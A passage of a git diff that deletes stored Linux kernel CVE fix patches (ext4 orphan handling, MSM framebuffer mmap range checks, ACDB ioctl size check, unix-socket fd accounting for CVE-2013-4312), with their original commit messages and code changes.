-found in tests/f_orphan_extents_inode/image.gz from the e2fsprogs
-source tree.  If a malicious user were to put this on a USB stick, and
-mount it on a Linux desktop which has automatic mounts enabled, this
-could be considered a potential denial of service attack.  (Not a big
-deal in practice, but professional paranoids worry about such things,
-and have even been known to allocate CVE numbers for such problems.)
-
--js: This is a fix for CVE-2013-2015.
-
-Signed-off-by: "Theodore Ts'o" <tytso@mit.edu>
-Reviewed-by: Zheng Liu <wenqing.lz@taobao.com>
-Acked-by: Jan Kara <jack@suse.cz>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- fs/ext4/namei.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
-index 9fb3fae4898a..54ad9a54cd89 100644
---- a/fs/ext4/namei.c
-+++ b/fs/ext4/namei.c
-@@ -2054,7 +2054,8 @@ int ext4_orphan_del(handle_t *handle, struct inode *inode)
- 	int err = 0;
- 
- 	/* ext4_handle_valid() assumes a valid handle_t pointer */
--	if (handle && !ext4_handle_valid(handle))
-+	if (handle && !ext4_handle_valid(handle) &&
-+	    !(EXT4_SB(inode->i_sb)->s_mount_state & EXT4_ORPHAN_FS))
- 		return 0;
- 
- 	mutex_lock(&EXT4_SB(inode->i_sb)->s_orphan_lock);
diff --git a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-2596/ANY/0001.patch
deleted file mode 100644
index 78f882fa..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 24b51892b863ad23a9fcb2a28a45e5cc15c2f3b5 Mon Sep 17 00:00:00 2001
-From: Manoj Rao <manojraj@codeaurora.org>
-Date: Tue, 16 Apr 2013 17:42:38 -0700
-Subject: mdss: mdss_fb: remove mmio access through mmap
-
-Disable access to mm io and add
-appropriate range checks to ensure valid accesses
-through framebuffer mmap. This prevents illegal
-access into memory.
-
-Change-Id: Ic6e47ec726d330d48ce9a7a708418492a553543b
-CRs-Fixed: 474706
-Signed-off-by: Manoj Rao <manojraj@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_fb.c | 16 +++++-----------
- 1 file changed, 5 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index e2d8cf6..f42df2a 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -669,22 +669,16 @@ static int mdss_fb_mmap(struct fb_info *info, struct vm_area_struct *vma)
- 	}
- 
- 	mdss_fb_pan_idle(mfd);
--	if (off >= len) {
--		/* memory mapped io */
--		off -= len;
--		if (info->var.accel_flags) {
--			mutex_unlock(&info->lock);
--			return -EINVAL;
--		}
--		start = info->fix.mmio_start;
--		len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
--	}
- 
- 	/* Set VM flags. */
- 	start &= PAGE_MASK;
--	if ((vma->vm_end - vma->vm_start + off) > len)
-+	if ((vma->vm_end <= vma->vm_start) ||
-+	    (off >= len) ||
-+	    ((vma->vm_end - vma->vm_start) > (len - off)))
- 		return -EINVAL;
- 	off += start;
-+	if (off < start)
-+		return -EINVAL;
- 	vma->vm_pgoff = off >> PAGE_SHIFT;
- 	/* This is an IO map - tell maydump to skip this VMA */
- 	vma->vm_flags |= VM_IO | VM_RESERVED;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-2596/ANY/0002.patch
deleted file mode 100644
index 6e74acaa..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0002.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 7e9785f78415d32e0b17b1d296a172b66e0d2ab7 Mon Sep 17 00:00:00 2001
-From: Manoj Rao <manojraj@codeaurora.org>
-Date: Fri, 12 Apr 2013 18:37:14 -0700
-Subject: msm: msm_fb: remove mmio access through mmap
-
-Disable access to mm io and add
-appropriate range checks to ensure valid accesses
-through framebuffer mmap. This prevents illegal
-access into memory.
-
-CRs-Fixed: 474706
-Change-Id: If25166f2732433ef967e99c716440030b567aae9
-Signed-off-by: Manoj Rao <manojraj@codeaurora.org>
-(cherry picked from commit b571bef36cf51f9bb4cd1ad3ba23e3cee6d1d3cb)
-
-Conflicts:
-
-	drivers/video/msm/msm_fb.c
-
-Signed-off-by: Raviteja <adimur@codeaurora.org>
----
- drivers/video/msm/msm_fb.c | 22 ++++++++++------------
- 1 file changed, 10 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/video/msm/msm_fb.c b/drivers/video/msm/msm_fb.c
-index 7d11fa9..2b626a0 100644
---- a/drivers/video/msm/msm_fb.c
-+++ b/drivers/video/msm/msm_fb.c
-@@ -1004,22 +1004,20 @@ static int msm_fb_mmap(struct fb_info *info, struct vm_area_struct * vma)
- 	u32 len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.smem_len);
- 	unsigned long off = vma->vm_pgoff << PAGE_SHIFT;
- 	struct msm_fb_data_type *mfd = (struct msm_fb_data_type *)info->par;
--	if (off >= len) {
--		/* memory mapped io */
--		off -= len;
--		if (info->var.accel_flags) {
--			mutex_unlock(&info->lock);
--			return -EINVAL;
--		}
--		start = info->fix.mmio_start;
--		len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
--	}
- 
-+	if (!start)
-+		return -EINVAL;
-+
-+	if ((vma->vm_end <= vma->vm_start) ||
-+	    (off >= len) ||
-+	    ((vma->vm_end - vma->vm_start) > (len - off)))
-+		return -EINVAL;
- 	/* Set VM flags. */
- 	start &= PAGE_MASK;
--	if ((vma->vm_end - vma->vm_start + off) > len)
--		return -EINVAL;
- 	off += start;
-+	if (off < start)
-+		return -EINVAL;
-+
- 	vma->vm_pgoff = off >> PAGE_SHIFT;
- 	/* This is an IO map - tell maydump to skip this VMA */
- 	vma->vm_flags |= VM_IO | VM_RESERVED;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2013-2596/ANY/0003.patch
deleted file mode 100644
index bb97f67c..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2596/ANY/0003.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From cdde1a87792a52274763eb006d326ca254ec3c63 Mon Sep 17 00:00:00 2001
-From: Manoj Rao <manojraj@codeaurora.org>
-Date: Fri, 12 Apr 2013 18:37:14 -0700
-Subject: msm: msm_fb: remove mmio access through mmap
-
-Disable access to mm io and add
-appropriate range checks to ensure valid accesses
-through framebuffer mmap. This prevents illegal
-access into memory.
-
-CRs-Fixed: 474706
-Change-Id: If25166f2732433ef967e99c716440030b567aae9
-Signed-off-by: Manoj Rao <manojraj@codeaurora.org>
----
- drivers/video/msm/msm_fb.c | 21 ++++++++-------------
- 1 file changed, 8 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/video/msm/msm_fb.c b/drivers/video/msm/msm_fb.c
-index adf50ed..9efe766 100644
---- a/drivers/video/msm/msm_fb.c
-+++ b/drivers/video/msm/msm_fb.c
-@@ -1166,23 +1166,18 @@ static int msm_fb_mmap(struct fb_info *info, struct vm_area_struct * vma)
- 	if (!start)
- 		return -EINVAL;
- 
--	msm_fb_pan_idle(mfd);
--	if (off >= len) {
--		/* memory mapped io */
--		off -= len;
--		if (info->var.accel_flags) {
--			mutex_unlock(&info->lock);
--			return -EINVAL;
--		}
--		start = info->fix.mmio_start;
--		len = PAGE_ALIGN((start & ~PAGE_MASK) + info->fix.mmio_len);
--	}
-+	if ((vma->vm_end <= vma->vm_start) ||
-+	    (off >= len) ||
-+	    ((vma->vm_end - vma->vm_start) > (len - off)))
-+		return -EINVAL;
- 
-+	msm_fb_pan_idle(mfd);
- 	/* Set VM flags. */
- 	start &= PAGE_MASK;
--	if ((vma->vm_end - vma->vm_start + off) > len)
--		return -EINVAL;
- 	off += start;
-+	if (off < start)
-+		return -EINVAL;
-+
- 	vma->vm_pgoff = off >> PAGE_SHIFT;
- 	/* This is an IO map - tell maydump to skip this VMA */
- 	vma->vm_flags |= VM_IO | VM_RESERVED;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-2597/ANY/0001.patch
deleted file mode 100644
index be377d7f..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From b44d5f71da7d2c44a7575376c582f9f1cde1cf6d Mon Sep 17 00:00:00 2001
-From: Ben Romberger <bromberg@codeaurora.org>
-Date: Wed, 3 Apr 2013 16:20:18 -0700
-Subject: ASoC: msm: Add size safety check to ACDB driver
-
-Check that the size sent by userspace is not larger
-then the internal amount allowed. This protects
-against overflowing the stack due to an invalid size.
-
-Change-Id: I4a5b5ca5212bea32b671027d68a66367c5d4c4e7
-CRs-fixed: 470222
-Signed-off-by: Ben Romberger <bromberg@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/audio_acdb.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/audio_acdb.c b/sound/soc/msm/qdsp6v2/audio_acdb.c
-index 16d6e81c..b2a469b 100644
---- a/sound/soc/msm/qdsp6v2/audio_acdb.c
-+++ b/sound/soc/msm/qdsp6v2/audio_acdb.c
-@@ -1064,7 +1064,7 @@ static long acdb_ioctl(struct file *f,
- 		goto done;
- 	}
- 
--	if (size <= 0) {
-+	if ((size <= 0) || (size > sizeof(data))) {
- 		pr_err("%s: Invalid size sent to driver: %d\n",
- 			__func__, size);
- 		result = -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-2597/ANY/0002.patch
deleted file mode 100644
index 2262a201..00000000
--- a/Patches/Linux_CVEs/CVE-2013-2597/ANY/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 76fb3e419e2b149292c3adf1e9171e2b542831bf Mon Sep 17 00:00:00 2001
-From: Ben Romberger <bromberg@codeaurora.org>
-Date: Wed, 8 May 2013 12:46:26 -0700
-Subject: msm: audio: qdsp6v2: Add size safety check to ACDB driver
-
-Check that the size sent by userspace is not larger
-then the internal amount allowed. This protects
-against overflowing the stack due to an invalid size.
-
-Change-Id: I8230fdb00a7b57d398929e8ab0eb6587476f3db1
-CRs-fixed: 470222
-Signed-off-by: Ben Romberger <bromberg@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/audio_acdb.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_acdb.c b/arch/arm/mach-msm/qdsp6v2/audio_acdb.c
-index 8efd808..aad14be 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_acdb.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_acdb.c
-@@ -770,7 +770,7 @@ static long acdb_ioctl(struct file *f,
- 		goto done;
- 	}
- 
--	if (size <= 0) {
-+	if ((size <= 0) || (size > sizeof(data))) {
- 		pr_err("%s: Invalid size sent to driver: %d\n",
- 			__func__, size);
- 		result = -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2013-4312/3.2/0001.patch
deleted file mode 100644
index 3cb07295..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0001.patch
+++ /dev/null
@@ -1,141 +0,0 @@
-From a5a6cf8c405e826ff7ed1308dde72560c0ed4854 Mon Sep 17 00:00:00 2001
-From: willy tarreau <w@1wt.eu>
-Date: Sun, 10 Jan 2016 07:54:56 +0100
-Subject: unix: properly account for FDs passed over unix sockets
-
-commit 712f4aad406bb1ed67f3f98d04c044191f0ff593 upstream.
-
-It is possible for a process to allocate and accumulate far more FDs than
-the process' limit by sending them over a unix socket then closing them
-to keep the process' fd count low.
-
-This change addresses this problem by keeping track of the number of FDs
-in flight per user and preventing non-privileged processes from having
-more FDs in flight than their configured FD limit.
-
-Reported-by: socketpair@gmail.com
-Reported-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
-Mitigates: CVE-2013-4312 (Linux 2.0+)
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[carnil: Backported to 3.16: adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- include/linux/sched.h |  1 +
- net/unix/af_unix.c    | 24 ++++++++++++++++++++----
- net/unix/garbage.c    | 14 ++++++++++----
- 3 files changed, 31 insertions(+), 8 deletions(-)
-
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 9b9ac29..2bffa8a 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -709,6 +709,7 @@ struct user_struct {
- 	unsigned long mq_bytes;	/* How many bytes can be allocated to mqueue? */
- #endif
- 	unsigned long locked_shm; /* How many pages of mlocked shm ? */
-+	unsigned long unix_inflight;	/* How many files in flight in unix sockets */
- 
- #ifdef CONFIG_KEYS
- 	struct key *uid_keyring;	/* UID specific keyring */
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 6cb363d..6798b3c 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1472,6 +1472,21 @@ static void unix_destruct_scm(struct sk_buff *skb)
- 	sock_wfree(skb);
- }
- 
-+/*
-+ * The "user->unix_inflight" variable is protected by the garbage
-+ * collection lock, and we just read it locklessly here. If you go
-+ * over the limit, there might be a tiny race in actually noticing
-+ * it across threads. Tough.
-+ */
-+static inline bool too_many_unix_fds(struct task_struct *p)
-+{
-+	struct user_struct *user = current_user();
-+
-+	if (unlikely(user->unix_inflight > task_rlimit(p, RLIMIT_NOFILE)))
-+		return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN);
-+	return false;
-+}
-+
- #define MAX_RECURSION_LEVEL 4
- 
- static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
-@@ -1480,6 +1495,9 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 	unsigned char max_level = 0;
- 	int unix_sock_count = 0;
- 
-+	if (too_many_unix_fds(current))
-+		return -ETOOMANYREFS;
-+
- 	for (i = scm->fp->count - 1; i >= 0; i--) {
- 		struct sock *sk = unix_get_socket(scm->fp->fp[i]);
- 
-@@ -1501,10 +1519,8 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 	if (!UNIXCB(skb).fp)
- 		return -ENOMEM;
- 
--	if (unix_sock_count) {
--		for (i = scm->fp->count - 1; i >= 0; i--)
--			unix_inflight(scm->fp->fp[i]);
--	}
-+	for (i = scm->fp->count - 1; i >= 0; i--)
-+		unix_inflight(scm->fp->fp[i]);
- 	return max_level;
- }
- 
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index 00d3e56..fd1a840 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -125,9 +125,11 @@ struct sock *unix_get_socket(struct file *filp)
- void unix_inflight(struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
-+
-+	spin_lock(&unix_gc_lock);
-+
- 	if (s) {
- 		struct unix_sock *u = unix_sk(s);
--		spin_lock(&unix_gc_lock);
- 		if (atomic_long_inc_return(&u->inflight) == 1) {
- 			BUG_ON(!list_empty(&u->link));
- 			list_add_tail(&u->link, &gc_inflight_list);
-@@ -135,22 +137,26 @@ void unix_inflight(struct file *fp)
- 			BUG_ON(list_empty(&u->link));
- 		}
- 		unix_tot_inflight++;
--		spin_unlock(&unix_gc_lock);
- 	}
-+	fp->f_cred->user->unix_inflight++;
-+	spin_unlock(&unix_gc_lock);
- }
- 
- void unix_notinflight(struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
-+
-+	spin_lock(&unix_gc_lock);
-+
- 	if (s) {
- 		struct unix_sock *u = unix_sk(s);
--		spin_lock(&unix_gc_lock);
- 		BUG_ON(list_empty(&u->link));
- 		if (atomic_long_dec_and_test(&u->inflight))
- 			list_del_init(&u->link);
- 		unix_tot_inflight--;
--		spin_unlock(&unix_gc_lock);
- 	}
-+	fp->f_cred->user->unix_inflight--;
-+	spin_unlock(&unix_gc_lock);
- }
- 
- static void scan_inflight(struct sock *x, void (*func)(struct unix_sock *),
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2013-4312/3.2/0002.patch
deleted file mode 100644
index ad02c976..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/3.2/0002.patch
+++ /dev/null
@@ -1,162 +0,0 @@
-From 5ea820046ee399214221c0bb817eb35d304c9604 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Date: Wed, 3 Feb 2016 02:11:03 +0100
-Subject: unix: correctly track in-flight fds in sending process user_struct
-
-commit 415e3d3e90ce9e18727e8843ae343eda5a58fad6 upstream.
-
-The commit referenced in the Fixes tag incorrectly accounted the number
-of in-flight fds over a unix domain socket to the original opener
-of the file-descriptor. This allows another process to arbitrary
-deplete the original file-openers resource limit for the maximum of
-open files. Instead the sending processes and its struct cred should
-be credited.
-
-To do so, we add a reference counted struct user_struct pointer to the
-scm_fp_list and use it to account for the number of inflight unix fds.
-
-Fixes: 712f4aad406bb1 ("unix: properly account for FDs passed over unix sockets")
-Reported-by: David Herrmann <dh.herrmann@gmail.com>
-Cc: David Herrmann <dh.herrmann@gmail.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- include/net/af_unix.h | 4 ++--
- include/net/scm.h     | 1 +
- net/core/scm.c        | 7 +++++++
- net/unix/af_unix.c    | 4 ++--
- net/unix/garbage.c    | 8 ++++----
- 5 files changed, 16 insertions(+), 8 deletions(-)
-
-diff --git a/include/net/af_unix.h b/include/net/af_unix.h
-index f4842f7..a69bfee 100644
---- a/include/net/af_unix.h
-+++ b/include/net/af_unix.h
-@@ -6,8 +6,8 @@
- #include <linux/mutex.h>
- #include <net/sock.h>
- 
--extern void unix_inflight(struct file *fp);
--extern void unix_notinflight(struct file *fp);
-+extern void unix_inflight(struct user_struct *user, struct file *fp);
-+extern void unix_notinflight(struct user_struct *user, struct file *fp);
- extern void unix_gc(void);
- extern void wait_for_unix_gc(void);
- extern struct sock *unix_get_socket(struct file *filp);
-diff --git a/include/net/scm.h b/include/net/scm.h
-index 5da0a7b..9822a68 100644
---- a/include/net/scm.h
-+++ b/include/net/scm.h
-@@ -16,6 +16,7 @@ struct scm_fp_list {
- 	struct list_head	list;
- 	short			count;
- 	short			max;
-+	struct user_struct	*user;
- 	struct file		*fp[SCM_MAX_FD];
- };
- 
-diff --git a/net/core/scm.c b/net/core/scm.c
-index 51b4d52..9adabed 100644
---- a/net/core/scm.c
-+++ b/net/core/scm.c
-@@ -80,6 +80,7 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- 		*fplp = fpl;
- 		fpl->count = 0;
- 		fpl->max = SCM_MAX_FD;
-+		fpl->user = NULL;
- 	}
- 	fpp = &fpl->fp[fpl->count];
- 
-@@ -100,6 +101,10 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- 		*fpp++ = file;
- 		fpl->count++;
- 	}
-+
-+	if (!fpl->user)
-+		fpl->user = get_uid(current_user());
-+
- 	return num;
- }
- 
-@@ -124,6 +129,7 @@ void __scm_destroy(struct scm_cookie *scm)
- 				list_del(&fpl->list);
- 				for (i=fpl->count-1; i>=0; i--)
- 					fput(fpl->fp[i]);
-+				free_uid(fpl->user);
- 				kfree(fpl);
- 			}
- 
-@@ -342,6 +348,7 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
- 		for (i = 0; i < fpl->count; i++)
- 			get_file(fpl->fp[i]);
- 		new_fpl->max = new_fpl->count;
-+		new_fpl->user = get_uid(fpl->user);
- 	}
- 	return new_fpl;
- }
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 6798b3c..390e079 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1454,7 +1454,7 @@ static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 	UNIXCB(skb).fp = NULL;
- 
- 	for (i = scm->fp->count-1; i >= 0; i--)
--		unix_notinflight(scm->fp->fp[i]);
-+		unix_notinflight(scm->fp->user, scm->fp->fp[i]);
- }
- 
- static void unix_destruct_scm(struct sk_buff *skb)
-@@ -1520,7 +1520,7 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 		return -ENOMEM;
- 
- 	for (i = scm->fp->count - 1; i >= 0; i--)
--		unix_inflight(scm->fp->fp[i]);
-+		unix_inflight(scm->fp->user, scm->fp->fp[i]);
- 	return max_level;
- }
- 
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index fd1a840..33a21260 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -122,7 +122,7 @@ struct sock *unix_get_socket(struct file *filp)
-  *	descriptor if it is for an AF_UNIX socket.
-  */
- 
--void unix_inflight(struct file *fp)
-+void unix_inflight(struct user_struct *user, struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
- 
-@@ -138,11 +138,11 @@ void unix_inflight(struct file *fp)
- 		}
- 		unix_tot_inflight++;
- 	}
--	fp->f_cred->user->unix_inflight++;
-+	user->unix_inflight++;
- 	spin_unlock(&unix_gc_lock);
- }
- 
--void unix_notinflight(struct file *fp)
-+void unix_notinflight(struct user_struct *user, struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
- 
-@@ -155,7 +155,7 @@ void unix_notinflight(struct file *fp)
- 			list_del_init(&u->link);
- 		unix_tot_inflight--;
- 	}
--	fp->f_cred->user->unix_inflight--;
-+	user->unix_inflight--;
- 	spin_unlock(&unix_gc_lock);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0003.patch b/Patches/Linux_CVEs/CVE-2013-4312/4.5/0003.patch
deleted file mode 100644
index 0d2161ce..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0003.patch
+++ /dev/null
@@ -1,140 +0,0 @@
-From 712f4aad406bb1ed67f3f98d04c044191f0ff593 Mon Sep 17 00:00:00 2001
-From: willy tarreau <w@1wt.eu>
-Date: Sun, 10 Jan 2016 07:54:56 +0100
-Subject: unix: properly account for FDs passed over unix sockets
-
-It is possible for a process to allocate and accumulate far more FDs than
-the process' limit by sending them over a unix socket then closing them
-to keep the process' fd count low.
-
-This change addresses this problem by keeping track of the number of FDs
-in flight per user and preventing non-privileged processes from having
-more FDs in flight than their configured FD limit.
-
-Reported-by: socketpair@gmail.com
-Reported-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
-Mitigates: CVE-2013-4312 (Linux 2.0+)
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/linux/sched.h |  1 +
- net/unix/af_unix.c    | 24 ++++++++++++++++++++----
- net/unix/garbage.c    | 13 ++++++++-----
- 3 files changed, 29 insertions(+), 9 deletions(-)
-
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index edad7a4..fbf25f1 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -830,6 +830,7 @@ struct user_struct {
- 	unsigned long mq_bytes;	/* How many bytes can be allocated to mqueue? */
- #endif
- 	unsigned long locked_shm; /* How many pages of mlocked shm ? */
-+	unsigned long unix_inflight;	/* How many files in flight in unix sockets */
- 
- #ifdef CONFIG_KEYS
- 	struct key *uid_keyring;	/* UID specific keyring */
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index ef05cd9..e3f85bc 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1513,6 +1513,21 @@ static void unix_destruct_scm(struct sk_buff *skb)
- 	sock_wfree(skb);
- }
- 
-+/*
-+ * The "user->unix_inflight" variable is protected by the garbage
-+ * collection lock, and we just read it locklessly here. If you go
-+ * over the limit, there might be a tiny race in actually noticing
-+ * it across threads. Tough.
-+ */
-+static inline bool too_many_unix_fds(struct task_struct *p)
-+{
-+	struct user_struct *user = current_user();
-+
-+	if (unlikely(user->unix_inflight > task_rlimit(p, RLIMIT_NOFILE)))
-+		return !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN);
-+	return false;
-+}
-+
- #define MAX_RECURSION_LEVEL 4
- 
- static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
-@@ -1521,6 +1536,9 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 	unsigned char max_level = 0;
- 	int unix_sock_count = 0;
- 
-+	if (too_many_unix_fds(current))
-+		return -ETOOMANYREFS;
-+
- 	for (i = scm->fp->count - 1; i >= 0; i--) {
- 		struct sock *sk = unix_get_socket(scm->fp->fp[i]);
- 
-@@ -1542,10 +1560,8 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 	if (!UNIXCB(skb).fp)
- 		return -ENOMEM;
- 
--	if (unix_sock_count) {
--		for (i = scm->fp->count - 1; i >= 0; i--)
--			unix_inflight(scm->fp->fp[i]);
--	}
-+	for (i = scm->fp->count - 1; i >= 0; i--)
-+		unix_inflight(scm->fp->fp[i]);
- 	return max_level;
- }
- 
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index a73a226..8fcdc22 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -120,11 +120,11 @@ void unix_inflight(struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
- 
-+	spin_lock(&unix_gc_lock);
-+
- 	if (s) {
- 		struct unix_sock *u = unix_sk(s);
- 
--		spin_lock(&unix_gc_lock);
--
- 		if (atomic_long_inc_return(&u->inflight) == 1) {
- 			BUG_ON(!list_empty(&u->link));
- 			list_add_tail(&u->link, &gc_inflight_list);
-@@ -132,25 +132,28 @@ void unix_inflight(struct file *fp)
- 			BUG_ON(list_empty(&u->link));
- 		}
- 		unix_tot_inflight++;
--		spin_unlock(&unix_gc_lock);
- 	}
-+	fp->f_cred->user->unix_inflight++;
-+	spin_unlock(&unix_gc_lock);
- }
- 
- void unix_notinflight(struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
- 
-+	spin_lock(&unix_gc_lock);
-+
- 	if (s) {
- 		struct unix_sock *u = unix_sk(s);
- 
--		spin_lock(&unix_gc_lock);
- 		BUG_ON(list_empty(&u->link));
- 
- 		if (atomic_long_dec_and_test(&u->inflight))
- 			list_del_init(&u->link);
- 		unix_tot_inflight--;
--		spin_unlock(&unix_gc_lock);
- 	}
-+	fp->f_cred->user->unix_inflight--;
-+	spin_unlock(&unix_gc_lock);
- }
- 
- static void scan_inflight(struct sock *x, void (*func)(struct unix_sock *),
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0004.patch b/Patches/Linux_CVEs/CVE-2013-4312/4.5/0004.patch
deleted file mode 100644
index 660997e9..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4312/4.5/0004.patch
+++ /dev/null
@@ -1,158 +0,0 @@
-From 415e3d3e90ce9e18727e8843ae343eda5a58fad6 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Date: Wed, 3 Feb 2016 02:11:03 +0100
-Subject: unix: correctly track in-flight fds in sending process user_struct
-
-The commit referenced in the Fixes tag incorrectly accounted the number
-of in-flight fds over a unix domain socket to the original opener
-of the file-descriptor. This allows another process to arbitrary
-deplete the original file-openers resource limit for the maximum of
-open files. Instead the sending processes and its struct cred should
-be credited.
-
-To do so, we add a reference counted struct user_struct pointer to the
-scm_fp_list and use it to account for the number of inflight unix fds.
-
-Fixes: 712f4aad406bb1 ("unix: properly account for FDs passed over unix sockets")
-Reported-by: David Herrmann <dh.herrmann@gmail.com>
-Cc: David Herrmann <dh.herrmann@gmail.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/net/af_unix.h | 4 ++--
- include/net/scm.h     | 1 +
- net/core/scm.c        | 7 +++++++
- net/unix/af_unix.c    | 4 ++--
- net/unix/garbage.c    | 8 ++++----
- 5 files changed, 16 insertions(+), 8 deletions(-)
-
-diff --git a/include/net/af_unix.h b/include/net/af_unix.h
-index 2a91a05..9b4c418 100644
---- a/include/net/af_unix.h
